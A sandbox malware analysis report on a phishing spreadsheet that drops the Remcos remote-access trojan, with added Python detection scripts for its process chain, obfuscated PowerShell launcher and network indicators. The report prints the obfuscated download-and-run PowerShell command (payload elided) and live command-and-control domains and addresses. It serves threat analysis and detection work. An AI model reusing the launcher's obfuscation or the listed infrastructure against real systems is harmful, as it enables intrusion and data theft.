Malware Analysis Report

2025-01-02 03:28

Sample ID: 240724-k3bc6ayajj
Target: Quotation.xls
SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Tags: remcos 2556 defense_evasion discovery execution phishing rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Threat Level: Known bad

The file Quotation.xls was found to be: Known bad.

Malicious Activity Summary

Tags: remcos 2556 defense_evasion discovery execution phishing rat

Process spawned unexpected child process
Remcos
Evasion via Device Credential Deployment
Blocklisted process makes network request
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Drops file in System32 directory
Suspicious use of SetThreadContext
Detected phishing page
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Uses Volume Shadow Copy WMI provider

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-24 09:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-24 09:07
Reported: 2024-07-24 09:09
Platform: win7-20240704-en
Max time kernel: 149s
Max time network: 134s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A (2 events)
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1968 set thread context of 2928 | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Detected phishing page

phishing

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2628 wrote to memory of 588 (4 events) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 884 (4 events) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 884 wrote to memory of 1052 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1052 wrote to memory of 1876 (4 events) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 884 wrote to memory of 1968 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\winiti.exe
PID 1968 wrote to memory of 2868 (5 events) | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2864 (13 events) | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2928 (13 events) | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
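The SetThreadContext and WriteProcessMemory rows above, read together with the process list that follows, give the whole chain: EXCEL.EXE, mshta.exe -Embedding, cmd.exe, the PowerShell launcher, csc.exe and cvtres.exe (PowerShell compiling C# at run time, which is what the l6tmq1s6.* files under Files are), the dropped winiti.exe, and finally three argument-less .NET Framework hosts written to by winiti.exe, of which AddInProcess32.exe (PID 2928) also has its thread context set and is the process whose 0x400000-0x482000 region was dumped. The Python below is an added example, not part of the sandbox report: it encodes that chain as parent/child rules of the kind an EDR process-creation feed can be run through, and prints the ancestry of any PID. The sample tree is constructed from the report's process list and PIDs; EXCEL's own PID (2848) and its parent PID (1000) are assumed because the report does not state them, and the two long launcher command lines are shortened.

```python
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# .NET Framework binaries commonly started empty and then hollowed; the report shows
# AddInProcess32.exe, CasPol.exe and msbuild.exe being written to by winiti.exe.
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe", "caspol.exe", "msbuild.exe",
                "regasm.exe", "regsvcs.exe", "installutil.exe"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def in_user_writable(image: str) -> bool:
    return any(d in image.lower() for d in USER_WRITABLE)


def detect(procs):
    """Return (rule, parent_pid, child_pid) for every parent/child edge matching a rule."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for child in procs:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue  # root of the captured tree; nothing to compare against
        pb, cb = basename(parent.image), basename(child.image)
        if pb in OFFICE_APPS and cb in SCRIPT_HOSTS:
            hits.append(("office_spawns_script_host", parent.pid, child.pid))
        if pb == "mshta.exe" and cb in {"cmd.exe", "powershell.exe"}:
            hits.append(("mshta_spawns_shell", parent.pid, child.pid))
        # csc.exe fed an @*.cmdline response file from PowerShell is Add-Type
        # compiling C# on the fly (the l6tmq1s6.cmdline/.0.cs/.dll files in the report).
        if pb == "powershell.exe" and cb == "csc.exe" and ".cmdline" in child.cmdline.lower():
            hits.append(("powershell_runtime_compile", parent.pid, child.pid))
        if pb == "powershell.exe" and cb not in SCRIPT_HOSTS and in_user_writable(child.image):
            hits.append(("powershell_runs_dropped_exe", parent.pid, child.pid))
        # A binary in a user-writable path starting a .NET host with no arguments is the
        # hollowing shape; corroborate with SetThreadContext/WriteProcessMemory events.
        bare = child.cmdline.strip().strip('"').lower() == child.image.lower()
        if in_user_writable(parent.image) and cb in DOTNET_HOSTS and bare:
            hits.append(("dropped_exe_spawns_bare_dotnet_host", parent.pid, child.pid))
    return hits


def ancestry(procs, pid: int):
    """Image basenames from the root of the captured tree down to pid."""
    by_pid = {p.pid: p for p in procs}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names[::-1]


# Constructed sample tree. PIDs 2628, 588, 884, 1052, 1876, 1968, 2868, 2864 and 2928
# are the report's; EXCEL's PID 2848 and its parent 1000 are assumed (not in the report).
NET20 = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727"
NET40 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
LAUNCHER = "PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ;"  # shortened
SAMPLE_TREE = [
    Proc(2848, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls'),
    Proc(2628, 2848, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    Proc(588, 2628, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" "/c ' + LAUNCHER + '"'),
    Proc(884, 588, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", LAUNCHER),
    Proc(1052, 884, NET20 + r"\csc.exe",
         '"' + NET20 + r'\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"'),
    Proc(1876, 1052, NET20 + r"\cvtres.exe", NET20 + r"\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    Proc(1968, 884, r"C:\Users\Admin\AppData\Roaming\winiti.exe", r'"C:\Users\Admin\AppData\Roaming\winiti.exe"'),
    Proc(2868, 1968, NET40 + r"\CasPol.exe", '"' + NET40 + r'\CasPol.exe"'),
    Proc(2864, 1968, NET40 + r"\msbuild.exe", '"' + NET40 + r'\msbuild.exe"'),
    Proc(2928, 1968, NET40 + r"\AddInProcess32.exe", '"' + NET40 + r'\AddInProcess32.exe"'),
]

if __name__ == "__main__":
    for rule, ppid, pid in detect(SAMPLE_TREE):
        print(f"{rule:40s} {ppid:>5} -> {pid}")
    print(" > ".join(ancestry(SAMPLE_TREE, 2928)))
```

The bare-host rule fires for CasPol.exe and msbuild.exe as well as AddInProcess32.exe; only the last is confirmed by the SetThreadContext row, so in a real pipeline that rule should raise severity when a matching SetThreadContext or memory-dump event exists and otherwise stay at hunting level.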

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'[base64 payload elided from this report]'+[chAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'[base64 payload elided from this report]'+[chAR]0x22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"

C:\Users\Admin\AppData\Roaming\winiti.exe

"C:\Users\Admin\AppData\Roaming\winiti.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
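The cmd.exe and powershell.exe command lines above use random casing, `[char]58+[char]0x3a` to spell `::` and `[char]0x22` to supply the quotes, so that neither `[System.Text.Encoding]::UTF8.GetString` nor `FromBase64String("...")` appears literally in the command line; the inner `iex` evaluates the concatenation and the outer `IeX` runs the decoded text. The leading `DEViCECrEDEntIaldEPLOyment` call runs DeviceCredentialDeployment.exe, whose documented LOLBAS use is hiding the console window it is run from, which is what the "Evasion via Device Credential Deployment" signature keys on. The Python below is an added example, not from the report: it resolves the concatenation statically, decodes the FromBase64String argument without running PowerShell, and lists the launcher traits worth alerting on regardless of payload. The base64 blob is elided in the report, so the sample command line carries a constructed stand-in second stage.

```python
import base64
import re

# One operand of a PowerShell '+' concatenation: a single-quoted literal or a
# [char]N cast with N decimal or 0x-hex. PowerShell is case-insensitive, so
# [chAR], [ChAr] and [char] are the same cast.
_OPERAND = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)

# FromBase64String("<payload>") as it looks once the [char]0x22 quotes are resolved.
_B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)

# Launcher traits that justify an alert on their own, matched case-insensitively.
_TRAITS = {
    "execution-policy-bypass": r"-ex(?:ecutionpolicy)?\s+bypass",
    "no-profile": r"-nop(?:rofile)?\b",
    "hidden-window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "device-credential-deployment": r"\bdevicecredentialdeployment\b",
    "invoke-expression": r"\biex\b|invoke-expression",
    "char-cast-concat": r"\[char\]\s*(?:0x[0-9a-f]+|\d+)\s*\+",
    "base64-decode": r"frombase64string",
}


def _char(number: str) -> str:
    return chr(int(number, 16) if number.lower().startswith("0x") else int(number))


def resolve_concat(expr: str) -> str:
    """Evaluate 'lit'+[char]58+[ChAr]0x3a+'lit' statically, without PowerShell."""
    return "".join(_char(num) if num else lit for lit, num in _OPERAND.findall(expr))


def decode_stage(cmdline: str) -> str:
    """Return the text the inner iex() would hand to the outer IeX()."""
    resolved = resolve_concat(cmdline)
    m = _B64_CALL.search(resolved)
    if m is None:
        raise ValueError('no FromBase64String("...") call after resolving the concatenation')
    return base64.b64decode(m.group(1)).decode("utf-8")


def traits(cmdline: str) -> list:
    """Sorted names of the launcher traits present in the command line."""
    return sorted(name for name, pat in _TRAITS.items() if re.search(pat, cmdline, re.IGNORECASE))


# Constructed sample: the launcher exactly as the report shows it, with a stand-in
# second stage in place of the elided base64 blob.
STAGE2 = 'Write-Output "constructed stage two"'
_B64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_CMDLINE = (
    "PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; "
    "IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'"
    "+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'" + _B64 + "'+[chAR]0x22+'))')))"
)

if __name__ == "__main__":
    print(resolve_concat(SAMPLE_CMDLINE))
    print(decode_stage(SAMPLE_CMDLINE))
    print(traits(SAMPLE_CMDLINE))
```

Resolving the concatenation first is what makes the base64 extraction reliable: a detection that looks for the literal string `FromBase64String("` in the raw command line misses this sample, while one that looks for `[char]` arithmetic adjacent to `iex` does not.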

Network

Country Destination Domain Proto
US 8.8.8.8:53 tny.wtf udp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 107.173.143.46:80 107.173.143.46 tcp
US 8.8.8.8:53 bossnacarpet.com udp
US 173.255.204.62:2556 bossnacarpet.com tcp
US 8.8.8.8:53 vegetachcnc.com udp
US 107.173.4.18:2556 vegetachcnc.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
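Read in order, the table above is the stage sequence: tny.wtf over HTTP, then bare-IP HTTP to 192.3.118.15 and 107.173.143.46 (where the HTA and the PE come from), then TCP/2556 to bossnacarpet.com and vegetachcnc.com (the Remcos C2; the 2556 tag in the report header is this port), then geoplugin.net, the geolocation service Remcos queries after start-up. The Python below is an added example, not part of the report: it parses rows in exactly this table's format, tags each connection, separates the reverse-lookup and Office telemetry noise that dominates the behavioral2 table, and emits a deduplicated blocklist. The sample rows are copied from the report's two Network tables; geoplugin.net is kept as a hunt indicator rather than a block entry because legitimate software uses it too.

```python
import ipaddress
import re
from collections import namedtuple

Conn = namedtuple("Conn", "country ip port domain proto")

# One row of the report's Network table: "<CC> <ip>:<port> <domain> <tcp|udp>".
_ROW = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?P<domain>\S+)\s+(?P<proto>tcp|udp)$"
)

# Indicators as they appear in this report.
C2_DOMAINS = {"bossnacarpet.com", "vegetachcnc.com"}
C2_PORT = 2556
STAGER_HOSTS = {"tny.wtf", "192.3.118.15", "107.173.143.46"}
GEO_SERVICES = {"geoplugin.net"}  # legitimate service Remcos queries: hunt on it, do not block it


def parse_rows(text: str):
    """Parse the report's table text; the header line and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            conns.append(Conn(m["cc"], m["ip"], int(m["port"]), m["domain"], m["proto"]))
    return conns


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def tag(conn: Conn) -> set:
    """Classify one connection. PTR lookups are sandbox/OS noise and get no other tag."""
    if conn.domain.endswith(".in-addr.arpa"):
        return {"ptr-noise"}
    tags = set()
    if conn.port == 53 and conn.proto == "udp":
        tags.add("dns-query")
    if conn.domain in C2_DOMAINS:
        tags.add("c2-domain")
    if conn.port == C2_PORT and conn.proto == "tcp":
        tags.add("c2-port")
    if conn.domain in STAGER_HOSTS:
        tags.add("stager")
    if conn.domain in GEO_SERVICES:
        tags.add("geo-check")
    # A "domain" that is itself an IP means no name was ever resolved: the payload
    # host was reached by literal address, which browsers and updaters rarely do.
    if _is_ip(conn.domain) and conn.proto == "tcp" and conn.port in (80, 443):
        tags.add("raw-ip-http")
    return tags


def indicators(conns) -> set:
    """Deduplicated blockable indicators: C2 domains, C2 ip:port pairs, stager hosts."""
    out = set()
    for c in conns:
        t = tag(c)
        if "c2-domain" in t:
            out.add(("domain", c.domain))
        if "c2-port" in t:
            out.add(("ip:port", "%s:%d" % (c.ip, c.port)))
        if "stager" in t and "dns-query" not in t:
            out.add(("host", c.domain))
    return out


# Rows copied from the report's behavioral1 table, plus one PTR lookup and one
# Office telemetry row from the behavioral2 table to show how noise is separated.
SAMPLE_TABLE = """
Country Destination Domain Proto
US 8.8.8.8:53 tny.wtf udp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 107.173.143.46:80 107.173.143.46 tcp
US 8.8.8.8:53 bossnacarpet.com udp
US 173.255.204.62:2556 bossnacarpet.com tcp
US 8.8.8.8:53 vegetachcnc.com udp
US 107.173.4.18:2556 vegetachcnc.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 15.118.3.192.in-addr.arpa udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
"""

if __name__ == "__main__":
    conns = parse_rows(SAMPLE_TABLE)
    for c in conns:
        print(f"{c.ip}:{c.port:<5} {c.domain:32s} {sorted(tag(c))}")
    for kind, value in sorted(indicators(conns)):
        print(f"block {kind:8s} {value}")
```

The `c2-port` tag is deliberately independent of the domain list: Remcos operators rotate domains far more often than the configured port, so a rule on outbound TCP/2556 from a user workstation keeps firing after the two domains above are retired.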

Files

memory/2848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2848-1-0x000000007292D000-0x0000000072938000-memory.dmp
memory/2848-4-0x0000000002370000-0x0000000002372000-memory.dmp
memory/2628-3-0x00000000022F0000-0x00000000022F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta

MD5 a183dcd47ab3d4ad39338dfe7eddff53
SHA1 4cd5c2dad4510df9516f6d16208bd284add559b5
SHA256 85c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682
SHA512 8818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791

\??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline

MD5 3fce564657419739a0491a5402a8c929
SHA1 f405e46f957bdf5d38b310fba68c8175c2acf36d
SHA256 47510126de9f30f68ac4fff997269741a20107c7e317800ab4b5e1e2c5688dca
SHA512 52b21784bf8520b7fa2e216cb3d925c5b0516c3c89bad08e17eba72ed63acdf655f1f88dd720ce8ab3b64dc0f28246c851bbda29aa16d603a76ae018aaa9c052

\??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.0.cs

MD5 a83dc0e46bbad233951be9e3fdba130c
SHA1 892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256 aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512 e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

\??\c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp

MD5 010033bada91ce77a8eae6c96c8627d2
SHA1 ee31b5cf1b1974b77766e6b3bccd730524e18a18
SHA256 bf4cc1b4b2f823aac74d3b7e3922fbde66c73a56ecda14d7be050f23f0e2223c
SHA512 04c6d9269b2a42fb35f83e707839ea1a01f0946d51d9e2e5ee6db668994b4bf75d030207ce7e77eeccf7060d726a00f455339d0011d84a274e6b2889a0ce1f2d

C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp

MD5 cd9200e66a5fa073a5549f36efb35a50
SHA1 c5f1942415b254a8715c92888e19c4e2efbb689b
SHA256 beb64070aa5707651ed331e35b53cd295de898c0f547c28cbfe0155415a6a4dc
SHA512 0c9b6dd08ccf7524ed00f9ed2c871dd6a7ef36373c8d1603108dd60fd018237f57f7187561d3f36aa33664670993e70110f034c46617e702bd03720bca8212a0

C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.dll

MD5 958fc6d7cff611120a9297af43662996
SHA1 f4b17148eedad42cdf26a1ccd7dc17f252450c68
SHA256 aee5f00d12d42d731fa43cbd0c39f2fac387c18f51a9c0332c45a6612c447db3
SHA512 a203a478aba35b3cf441f0fad42f708c618965767be9d4dd88f8e5267412fd5e45b11ba118f21af2a786b1fd47e006dc180da71087a20b8f3c36dc360cdf9fd7

C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.pdb

MD5 e70684c20cbbb0ba7c7b8634a0727159
SHA1 14e5e9df9ad67a941cd7c0cd68f79f9d18d7b5ff
SHA256 ac4a8a14046d155b0a0bbcd1b0b19a7f79018d27c70e65957e768323a5db273d
SHA512 c2a4556f83a9fcae888b0fc67605ccd01919e6933626b26061e38b465d83519addb8fc9e4c72c5172a877a43bd76124fd86d80410b4dd5673190cd79df60dadb

C:\Users\Admin\AppData\Roaming\winiti.exe

MD5 f6bf8ada032d17192526ffebb48aed79
SHA1 362cb802e430115288638c9d613f00412f1b2519
SHA256 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA512 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

memory/2928-37-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-36-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-38-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2848-40-0x000000007292D000-0x0000000072938000-memory.dmp
memory/2928-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-42-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-43-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-45-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2848-53-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2848-56-0x000000007292D000-0x0000000072938000-memory.dmp
memory/2928-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2928-59-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-24 09:07
Reported: 2024-07-24 09:09
Platform: win10v2004-20240709-en
Max time kernel: 145s
Max time network: 151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1628 wrote to memory of 408 (2 events) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

